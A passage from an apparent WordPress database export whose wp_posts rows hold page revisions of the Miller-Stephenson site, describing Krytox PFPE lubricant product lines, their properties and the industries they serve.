an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about these products visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n\r\n<BR>\r\n[product_categories number="2" ids="10,94" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\n', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 18:21:29', '2016-09-28 18:21:29', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2109, 1, '2016-09-28 18:47:58', '2016-09-28 18:47:58', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about these products visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n\r\n<BR>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\n', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 18:47:58', '2016-09-28 18:47:58', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2110, 2, '2016-09-28 18:48:00', '2016-09-28 18:48:00', '<p>&nbsp;</p>\n[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Aerospace, Aviation, and National Defense</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Squeak & Rattle</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Mechanical Systems</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Box Board Corrugating</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Chemical and Petrochemical</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Electronics / Semiconductor</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Food Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Medical Industry</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Metal Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Oxygen & Reactive Gas Service</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Power Generation</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Pulp & Paper</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Textile</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Tire Mold</a></p>\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\n<p><strong>Pick your Industry</strong></p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<p><strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong></p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p><strong>Box Board Corrugating</strong></p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p><strong>Food Processing</strong></p>\n<p><strong>Medical Industry Equipment Applications</strong></p>\n<p><strong>Metal Processing</strong></p>\n<p><strong>Oxygen and Reactive Gas Service</strong></p>\n<p><strong>Power Generation</strong></p>\n<p><strong>Pulp and Paper</strong></p>\n<p><strong>Textile</strong></p>\n<p><strong>Tire Mold</strong></p>\n<p>&nbsp;</p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 